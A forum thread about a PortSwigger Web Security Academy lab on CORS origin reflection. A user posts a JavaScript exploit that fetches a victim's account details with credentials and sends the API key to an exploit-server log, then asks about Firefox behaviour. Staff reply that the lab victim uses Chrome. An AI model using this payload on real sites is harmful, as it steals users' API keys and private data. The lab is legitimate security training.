The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: CORS vulnerability with basic origin reflection

Ngts | Last updated: Mar 01, 2023 07:46AM UTC

why do i see this message in firefox when i click on view exploit but sending it to victim works. (Reason: CORS header ‘Access-Control-Allow-Origin’ missing). Status code: 401. code: <script> fetch('https://xxxx.web-security-academy.net/accountDetails', { credentials: 'include', }) .then(response => response.json()) .then(resp => { location = '/logs?key=' + resp.apikey; }); </script> Also looking at the response i see there is no ‘Access-Control-Allow-*’ headers received in the preflight request. Though when i switch my code to use xmlhttprequest it works perfectly fine

Michelle, PortSwigger Agent | Last updated: Mar 03, 2023 12:08PM UTC

The victim in the labs will be using Chrome, so it can be worth checking the behavior in the same browser when testing out exploits. I hope this helps.

Trevor | Last updated: Mar 03, 2023 03:58PM UTC